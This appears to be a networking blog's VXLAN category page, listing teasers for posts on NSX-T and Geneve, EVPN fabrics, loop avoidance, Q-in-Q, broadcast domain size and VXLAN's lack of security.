Category: VXLAN

VMware NSX-T and Geneve Q&A

A Network Artist left a lengthy comment on my Brief History of VMware NSX blog post. He raised a number of interesting topics, so I decided to write my replies as a separate blog post.

Using Geneve is an interesting choice to be made and while the approach has it’s own Pros and Cons, I would like to stick to VXLAN if I were to recommend to someone for few good reasons.

The main reason I see for NSX-T using Geneve instead of VXLAN is the need for additional header fields to carry metadata around, and to implement Network Services Header (NSH) for east-west service insertion.

read more see 3 comments

Don't Base Your Design on Vendor Marketing

Remember how Arista promoted VXLAN coupled with deep buffer switches as the perfect DCI solution a few years ago? Someone took Arista’s marketing too literally, ran with the idea and combined VXLAN-based DCI with traditional MLAG+STP data center fabric.

While I love that they wrote a blog post documenting their experience (if only more people would do that), it doesn’t change the fact that the design contains the worst of both worlds.

Here are just a few things that went wrong:

read more see 10 comments

Building Fabric Infrastructure for an OpenStack Private Cloud

An attendee in my Building Next-Generation Data Center online course was asked to deploy numerous relatively small OpenStack cloud instances and wanted select the optimum virtual networking technology. Not surprisingly, every $vendor had just the right answer, including Arista:

We’re considering moving from hypervisor-based overlays to ToR-based overlays using Arista’s CVX for approximately 2000 VLANs.

As I explained in Overlay Virtual Networking, Networking in Private and Public Clouds and Designing Private Cloud Infrastructure (plus several presentations) you have three options to implement virtual networking in private clouds:

read more see 1 comments

Private VLANs With VXLAN

I got this remark from a reader after he read the VXLAN and Q-in-Q blog post:

Another area with a feature gap with EVPN VXLAN is Private VLANs with VXLAN. They’re not supported on either Nexus or Juniper switches.

I have one word on using private VLANs in 2019: Don’t. They are messy and complicated to maintain (not to mention how exciting it gets to combine virtual and physical switches).

read more see 6 comments

Loop Avoidance in VXLAN Networks

Antonio Boj sent me this interesting challenge:

Is there any way to avoid, prevent or at least mitigate bridging loops when using VXLAN with EVPN? Spanning-tree is not supported when using VXLAN encapsulation so I was hoping to use EVPN duplicate MAC detection.

MAC move dampening (or anything similar) doesn’t help if you have a forwarding loop. You might be able to use it to identify there’s a loop, but that’s it… and while you’re doing that your network is melting down.

read more see 7 comments

Q-in-Q Support in Multi-Site EVPN

One of my subscribers sent me a question along these lines (heavily abridged):

My customer runs a colocation business and has to provide L2 connectivity between racks, sometimes even across multiple data centers. They were using Q-in-Q to deliver that in a traditional fabric and would like to replace that with multi-site EVPN fabric with ~100 ToR switches in each data center. However, Cisco doesn’t support Q-in-Q with multi-site EVPN. Any ideas?

As Lukas Krattiger explained in his part of Multi-Site Leaf-and-Spine Fabrics section of Leaf-and-Spine Fabric Architectures webinar, multi-site EVPN (VXLAN-to-VXLAN bridging) is hard. Don’t expect miracles like Q-in-Q over VNI any time soon ;)

read more see 4 comments

Interview: Active-Active Data Centers With VXLAN and EVPN

Christoph Jaggi asked me a few questions about using VXLAN with EVPN to build data center fabrics and interconnects (including active/active data centers). The German version was published on Inside-IT; here’s the English version.

He started with an obvious one:

What is an active-active data center, and why would I want to use it?

Numerous organizations have multiple data centers for load sharing or disaster recovery purposes. They could use one of their data centers and have the other(s) as warm or cold standby (active/backup setup) or use all data centers at the same time (active/active).

read more see 3 comments

OMG, VXLAN Is Still Insecure

A friend of mine told me about a “VXLAN is insecure, the sky is falling” presentation from RIPE-77 which claims that you can (under certain circumstances) inject packets into VXLAN virtual networks from the Internet.

Welcome back, Captain Obvious. Anyone looking at the VXLAN packet could immediately figure out that there’s no security in VXLAN. I pointed that out several times in my blog posts and presentations, including Cloud Computing Networking (EuroNOG, September 2011) and NSX Architecture webinar (August 2013).

read more see 8 comments

VXLAN and EVPN on Hypervisor Hosts

One of my readers sent me a series of questions regarding a new cloud deployment where the cloud implementers want to run VXLAN and EVPN on the hypervisor hosts:

I am currently working on a leaf-and-spine VXLAN+ EVPN PoC. At the same time, the systems team in my company is working on building a Cloudstack platform and are insisting on using VXLAN on the compute node even to the point of using BGP for inter-VXLAN traffic on the nodes.

Using VXLAN (or GRE) encap/decap on the hypervisor hosts is nothing new. That’s how NSX and many OpenStack implementations work.

read more see 5 comments

VXLAN Broadcast Domain Size Limitations

One of the attendees of my Building Next-Generation Data Center online course tried to figure out whether you can build larger broadcast domains with VXLAN than you could with VLANs. Here’s what he sent me:

I’m trying to understand differences or similarities between VLAN and VXLAN technologies in a view of (*cast) domain limitation.

There’s no difference between the two on the client-facing side. VXLAN is just an encapsulation technology and doesn’t change how bridging works at all (read also part 2 of that story).

read more see 3 comments

VXLAN Limitations of Data Center Switches

One of my readers found a Culumus Networks article that explains why you can’t have more than a few hundred VXLAN-based VLAN segments on every port of 48-port Trident-2 data center switch. That article has unfortunately disappeared in the meantime, and even the Wayback Machine doesn’t have a copy.

Expect to see similar limitations in most other chipsets. There’s a huge gap between millions of segments enabled by 24-bit VXLAN Network Identifier and reality of switching silicon. Most switching hardware is also limited to 4K VLANs.
read more see 5 comments

Could We Build an IXP on Top of VXLAN Infrastructure?

Andy sent me this question:

I'm currently playing around with BGP & VXLANs and wondering: is there anything preventing from building a virtual IXP with VXLAN? This would be then a large layer 2 network - but why have nobody build this to now, or why do internet exchanges do not provide this?

There was at least one IXP that was running on top of VXLAN. I wanted to do a podcast about it with people who helped them build it in early 2015 but one of them got a gag order.

read more see 11 comments

Are VXLAN-Based Large Layer-2 Domains Safer?

One of my readers was wondering about the stability and scalability of large layer-2 domains implemented with VXLAN. He wrote:

If common BUM traffic (e.g. ARP) is being handled/localized by the network (e.g. NSX or ACI), and if we are managing what traffic hosts can send with micro-segmentation style filtering blocking broadcast/multicast, are large layer-2 domains still a recipe for disaster?

There are three major (fundamental) problems with large L2 domains:

read more see 4 comments
Sidebar